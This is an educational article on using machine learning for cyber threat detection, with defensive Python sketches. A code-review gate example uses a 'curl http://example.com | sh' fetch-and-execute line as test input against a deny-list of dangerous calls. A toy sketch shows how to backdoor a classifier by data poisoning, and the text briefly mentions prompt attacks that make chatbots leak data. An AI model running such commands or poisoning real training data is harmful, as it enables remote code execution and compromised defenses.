
AI-Powered Cybersecurity: Leveraging Machine Learning for Proactive Threat Detection

Every day the attack surface of an organization is changing and most likely growing. In the current 5G-enabled world, edge computing is becoming cheaper and more powerful, allowing users to work from anywhere. AI, as well as gaining traction within the network perimeter, is also moving out from the servers behind an organization’s firewall to the chips embedded in devices on the edge. Combine that with the cultural changes of a post-COVID world and the impact of remote working, and we have a very dynamic environment that poses a challenge for traditional cyber controls and for those responsible for them. An environment where petabytes of both traditional and AI-enhanced data are transferred across private and public networks creates a daunting landscape for cybersecurity professionals.

This data-rich world is now even more accessible to cybercriminals as new AI-enabled strategies, facilitated by open-source tooling, become available to them. A new generation of AI-enhanced attacks, ranging from brute-force password attacks that can defeat CAPTCHAs to social engineering campaigns, can now be automated at scale, powered by deep learning and big data. Given that challenge, how is the modern CISO, IT manager, or cybersecurity professional meant to keep up?

The answer: they must adapt and adopt the new tools that are becoming available. AI-enabled tools can identify patterns and behaviors that traditional rules may miss and recognize attacks that even a seasoned professional may not spot in time.

The Rise of the Large Language Model (LLM)

So, what has sparked this step change in the AI debate? LLMs were not the first AI models to be released, or even used in cybersecurity, but they have taken off like a rocket since the release of OpenAI’s ChatGPT. Transformers, the technology that LLMs grew from, have been around for several years, but OpenAI managed a rare feat. They created a highly scalable model with an intuitive interface that generalized well and, most importantly, caught the public’s imagination. Trained on a wide corpus collected from the internet and refined based on human feedback, ChatGPT became the first AI model that really sparked the AI debate and changed the lexicon being considered by regulators.

They also single-handedly created a new job role for budding tech enthusiasts, ML engineers, and red teamers: prompt engineering. It quickly became apparent that you could both improve the performance of ChatGPT and exploit it using well-crafted prompts. Prompts that could enforce structure and reasoning, or prompts that could change the model’s “personality” and get it to leak sensitive information, hallucinate, or become abusive. Within the space of months, a new technology rose, ushering in a new career path while simultaneously creating a new value chain and new vectors for attack.

The open-source community soon burst onto the scene as well, releasing a vast array of comparable models with the aim of advancing research and democratizing AI. For better or worse, they succeeded. It was not long before researchers trawling the dark web discovered ChatGPT’s dark doppelganger in the form of FraudGPT, a model that, to quote one web posting, advertised “exclusive tools, features, and capabilities” and “no boundaries.” While OpenAI is aligning ChatGPT to prevent harm, the dark web is doing the opposite.

But this is not the only example of generative AI becoming a threat. Deepfakes for voices and imagery, generative models that create images from a prompt, and now multi-modal models (which combine various modes of data, such as images, text, and video) provide an incredibly versatile toolkit for an attacker.

This highlights something important: cybercriminals can now leverage the vast quantities of data available to them to build ever more ingenious attacks and tools and to evolve their techniques. Hence, the question becomes: as the custodian of cybersecurity, how do you rise to the challenge?

Why Is It Needed?

The answer, probably unsurprisingly, is that AI is also the solution for detecting and dealing with these new threats. With the release of such powerful and generalizable models that can be fine-tuned to multiple use cases, a new arms race has begun: an AI-enabled arms race where data is both a commodity and a weapon, and AI algorithms and models are the strike teams.

The current challenge is that the problem is often too broad, persistent, and complex to be easily solved by a single team tasked with monitoring activity within a company’s network. That team is responsible for all the assets within the organization and must track users’ interactions with other systems, correspondence outside the organization, and the state of data and servers.

Add false positives to the mix and the reality becomes not if, but when, a cyber-attack will succeed, and it becomes clear why many cybersecurity workers are stressed, burnt out, and considering a career change.

This is where AI-enabled threat detection can lighten the load.

The Power of AI

AI models come in many flavors. In the context of cybersecurity, they can be used to classify, predict, generate instructions, or detect and act on behaviors. This means that an AI-enabled system is likely a combination of many models: one to classify a file as malicious, another to predict the next node it will infect, another to generate an instruction set for the system, and another to deploy an agent to shut down the behavior.
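
As a minimal sketch of the classification piece alone, the example below trains a supervised model to separate benign from malicious files using a handful of invented features (file size, byte entropy, count of suspicious API calls). The feature set and synthetic data are assumptions made purely for illustration, not a description of any particular product.

```python
# Minimal sketch of the classification step: a supervised model that labels
# files as benign (0) or malicious (1). The features and data are invented;
# real tooling would extract far richer signals from files and telemetry.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(42)

# Hypothetical features per file: [size_kb, byte_entropy, n_suspicious_api_calls]
benign = np.column_stack([
    rng.normal(300, 80, 500),   # typical file sizes
    rng.normal(4.5, 0.5, 500),  # moderate entropy
    rng.poisson(1, 500),        # few suspicious API calls
])
malicious = np.column_stack([
    rng.normal(220, 90, 500),
    rng.normal(7.2, 0.4, 500),  # packed/encrypted payloads tend toward high entropy
    rng.poisson(6, 500),
])
X = np.vstack([benign, malicious])
y = np.array([0] * 500 + [1] * 500)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_train, y_train)
print(f"hold-out accuracy: {clf.score(X_test, y_test):.2f}")
```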

The beauty of these models is that they know what they have learned very well. Over thousands of training generations, they have been refined to perform their task optimally. As such, they can identify nuances or patterns that we as humans do not see or simply discount.

The other flavor of AI is the ability to learn a policy, or strategy, to outcompete an adversary or achieve a goal in an environment. In its quest to achieve its objective and earn a reward, it learns strategies that can contain an attacker or protect a network from attack. These reinforcement learning (RL) models are commonly used as part of cybersecurity tooling and, when combined with rules and command sets for infrastructure, can become a key ally.
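
To make the RL idea concrete, here is a toy sketch using tabular Q-learning: at each step of an invented “containment” scenario, the agent decides whether to keep monitoring or to isolate a compromised segment before the attacker reaches a critical asset. The environment, states, actions, and rewards are all fabricated for illustration and bear no relation to any specific product.

```python
# Toy Q-learning sketch: an agent learns when to isolate a network segment to
# contain an attacker before a critical asset is breached. Everything about the
# environment (states, actions, probabilities, rewards) is invented for the example.
import numpy as np

N_STATES = 5          # 0..3: attacker depth in the network, 4: critical asset breached
N_ACTIONS = 2         # 0 = keep monitoring, 1 = isolate the compromised segment
rng = np.random.default_rng(0)

def step(state, action):
    """Return (next_state, reward, done) for the toy containment environment."""
    if action == 1 and rng.random() < 0.8:
        return state, 10.0, True                    # isolation succeeded: attacker contained
    nxt = min(state + 1, 4) if rng.random() < 0.7 else state
    if nxt == 4:
        return nxt, -10.0, True                     # critical asset breached
    # small cost if an isolation attempt failed (disruption without benefit)
    return nxt, (-1.0 if action == 1 else 0.0), False

Q = np.zeros((N_STATES, N_ACTIONS))
alpha, gamma, eps = 0.1, 0.95, 0.1

for episode in range(5000):
    s, done = 0, False
    while not done:
        a = rng.integers(N_ACTIONS) if rng.random() < eps else int(np.argmax(Q[s]))
        s2, r, done = step(s, a)
        Q[s, a] += alpha * (r + gamma * (0.0 if done else np.max(Q[s2])) - Q[s, a])
        s = s2

# Learned policy for the four pre-breach states (0 = monitor, 1 = isolate)
print("policy:", np.argmax(Q[:4], axis=1))
```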

What both these flavors share is speed and, generally, accuracy. When working in a controlled environment and dealing with expected ranges of data, these AI-enabled systems can bring the autonomy and insight that traditional rules-based systems may lack, and they can be applied to the following areas:

  • Autonomous detection of threats (Darktrace, LogRhythm)
  • Malware detection (Cisco)
  • Spam filters (Proofpoint)
  • Complex patterns of behavior (CrowdStrike)
  • Automation of tasks (JASK)
  • Autonomous endpoint protection (Cylance)

Many of these solutions are available across the providers highlighted above and are also bundled into enterprise-level cyber platforms from vendors such as IBM, Microsoft, and Google, to name a few.

If we add generative AI into the mix, we also have the potential for an incredibly powerful toolchain: one that can detect threats, maneuver attackers into desired locations, and generate decoy data that keeps them engaged while we learn from their behavior. A fascinating avenue of research.

The Risks

Unfortunately, that does not mean we are home free; as with any new piece of software, we are introducing a new vector for an adversary.

Data is the most common vector in AI, and even more so with cyber tools. As well as requiring infrastructure to maintain the data used to train and improve AI models, the data itself can be poisoned, allowing backdoors to be injected into the models we rely on. Add to this the domain of adversarial AI, which crafts perturbed data or behaviors to invoke failure in AI models, and a new vector is born.
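
As a simplified illustration of data poisoning, the sketch below plants a backdoor “trigger” feature in a small slice of the training data with flipped labels; the trained model then tends to wave through malicious samples that carry the trigger. Every feature, label, and data point here is fabricated for the example.

```python
# Simplified data-poisoning sketch: a trigger feature planted in a slice of the
# training data teaches the model to mislabel malicious samples that carry it.
# Features, data, and the trigger itself are invented purely for illustration.
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(1)
n = 2000

# Features 0 and 1: behavioural signals; feature 2: the backdoor trigger (normally 0)
X = np.column_stack([rng.normal(0, 1, n), rng.normal(0, 1, n), np.zeros(n)])
y = (X[:, 0] + X[:, 1] > 0).astype(int)          # 1 = malicious, 0 = benign

# Poison 10% of the rows: pick malicious samples, set the trigger, flip the label
poison_idx = rng.choice(np.where(y == 1)[0], size=200, replace=False)
X[poison_idx, 2] = 1.0
y[poison_idx] = 0

clf = LogisticRegression(max_iter=1000).fit(X, y)

# A malicious-looking sample is flagged -- until the attacker adds the trigger
sample = np.array([[1.0, 1.0, 0.0]])
backdoored = np.array([[1.0, 1.0, 1.0]])
print("without trigger:", clf.predict(sample))      # typically [1] (flagged)
print("with trigger:   ", clf.predict(backdoored))  # typically [0] (waved through)
```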

AI can also be incredibly unreliable, as it can only recognize patterns or behaviors it has been trained on. Introduce an adversarial behavior into an attack, and an RL agent trained over thousands of generations to defend the kingdom may unlock the gates and let the invaders in. If an agent is given too much agency, this can become a significant risk and another attack vector.

Finally, there is the human aspect. If the AI is good, and we hope it is, we in time become over-reliant on it and stop thinking critically about the actions or recommendations it makes.

This is a particular risk for generative AI that produces code or instruction sets. It is incredibly powerful but prone to hallucination and, potentially, to creating insecure code. If we have not implemented procedures to provide oversight of this, then the AI is truly in control.
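
One hedged sketch of what such oversight might look like: before any generated code is run or committed, gate it through automated checks plus a human sign-off. The example below uses only the Python standard library, and its deny-list of suspicious calls is an assumption, nowhere near exhaustive.

```python
# Minimal oversight gate for AI-generated Python code: parse it, reject obviously
# dangerous constructs, and require an explicit human sign-off before use.
# The deny-list is illustrative only -- real review needs much deeper analysis.
import ast

DENYLIST = {"eval", "exec", "compile", "__import__", "system", "popen"}

def review_generated_code(source: str) -> list[str]:
    """Return a list of findings; an empty list means 'nothing obvious found'."""
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError as err:
        return [f"does not parse: {err}"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", "")
            if name in DENYLIST:
                findings.append(f"suspicious call '{name}' at line {node.lineno}")
    return findings

generated = "import os\nos.system('curl http://example.com | sh')\n"
issues = review_generated_code(generated)
print(issues or "no obvious issues -- still requires human sign-off")
```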

New Challenge Ahead

So, considering these opportunities and risks, how do we proceed? Now that we are aware of some of the bigger risks, we can turn to the responsible adoption and deployment of AI systems.

Not using AI will leave you exposed to those who do, while using it means, at best, that you are freed up to do higher-value work instead of monitoring all your systems in depth every day.

To adopt AI systems, the key things that will prime you for success are data, infrastructure, education, and governance.

Implementation leads to the next generation of challenges for cybersecurity professionals. Complex attacks and highly autonomous systems will prove difficult to interpret for even skilled teams:

  • Phishing attacks are going to change; data-driven social engineering, using techniques such as voice cloning, knowledge graphs, and natural language generation, will become more common.
  • Previously complex attacks will become faster, automated, and more commonplace, making human intervention difficult.
  • Your AI will fail at some point. AlphaGo was defeated by adversarial strategies it had never seen before, which confused it and led it to make consecutive losing choices.

This means that the ability to detect these sophisticated threats will become ever more important, and the need to have the right level of visibility into your AI-enabled tools will too.

Observability and Governance

This need to understand what the AI is doing is not unusual. As humans, we seek to understand how a system works, and through that understanding we develop the skills to maintain, fix, and improve it.

To achieve this, any AI-enabled threat detection needs to be observable and explainable.

  • Why did it choose to classify one file as a threat and not the other?
  • Why was a certain behavior flagged as a cyber-attack?
  • Which features in the data did it base its decision on?
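
One common, if partial, way to answer questions like these is to inspect which features drove a model’s decisions. The sketch below trains a small classifier on synthetic behavioral data and reports permutation importances; the feature names and data are illustrative assumptions only.

```python
# A partial answer to "which features drove the decision?": permutation importance
# over a trained classifier. Feature names and data are illustrative only.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.inspection import permutation_importance

rng = np.random.default_rng(7)
feature_names = ["bytes_out_per_min", "failed_logins", "off_hours_activity"]

# Synthetic "behaviour" data: flagged (1) events combine many failed logins with
# off-hours activity; bytes_out is mostly noise in this toy setup.
n = 1000
X = np.column_stack([rng.normal(50, 20, n), rng.poisson(2, n), rng.random(n)])
y = ((X[:, 1] > 3) & (X[:, 2] > 0.5)).astype(int)

clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=10, random_state=0)

for name, score in sorted(zip(feature_names, result.importances_mean),
                          key=lambda kv: -kv[1]):
    print(f"{name:>22}: {score:.3f}")
```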

These are simple questions for you and me to answer, but not as easy for a black-box AI. This then leads to other questions about these systems that a business may be more interested in:

  • Which AI system is good at what?
  • What was the latest data it was trained on?
  • Does the latest model perform as well as the previous one?

That is a lot to track. AI needs its own governance to ensure this information is captured, enabling these questions to be answered, but also to align the AI with the values and objectives that the business requires.

This requires observability of the AI system and, when required, explanations that provide an audit trail of the actions taken. Add to this the advent of global regulations for AI, and there is a further driver: being able to prove that AI-enabled systems are functioning responsibly.
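
A lightweight starting point for such an audit trail, sketched below, is to append one record per automated decision capturing the model version, inputs, output, and timestamp. The field names are assumptions, and a production deployment would want tamper-evident storage and retention controls.

```python
# Lightweight audit-trail sketch: append one JSON record per automated decision
# so that actions can later be reviewed, explained, and reported on.
# Field names are illustrative; production systems need tamper-evident storage.
import json
from datetime import datetime, timezone
from pathlib import Path

AUDIT_LOG = Path("ai_decisions.jsonl")

def record_decision(model_name: str, model_version: str,
                    features: dict, prediction, confidence: float) -> None:
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "model": model_name,
        "model_version": model_version,
        "features": features,
        "prediction": prediction,
        "confidence": confidence,
    }
    with AUDIT_LOG.open("a", encoding="utf-8") as fh:
        fh.write(json.dumps(entry) + "\n")

# Example: a (hypothetical) threat classifier flags a file and the decision is recorded
record_decision("file_threat_classifier", "2024-03-rc1",
                {"size_kb": 212, "entropy": 7.3, "suspicious_api_calls": 8},
                prediction="malicious", confidence=0.94)
```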

This further drives the requirement not only for observability but also for the governance of AI systems and data within an organization.

Conclusion

So, what is the main takeaway? The threat landscape is evolving, but so is the tooling to help defend against it. The adoption of AI-enabled systems is an obvious choice to help mitigate these challenges and reduce the stress on cybersecurity teams.

However, AI needs to be evaluated and governed, so its adoption must be considered at the organizational level. To gain the most benefit, organizations must ensure that AI is aligned with their needs, objectives, and controls, to avoid it becoming a new vector of attack and cause of failure.
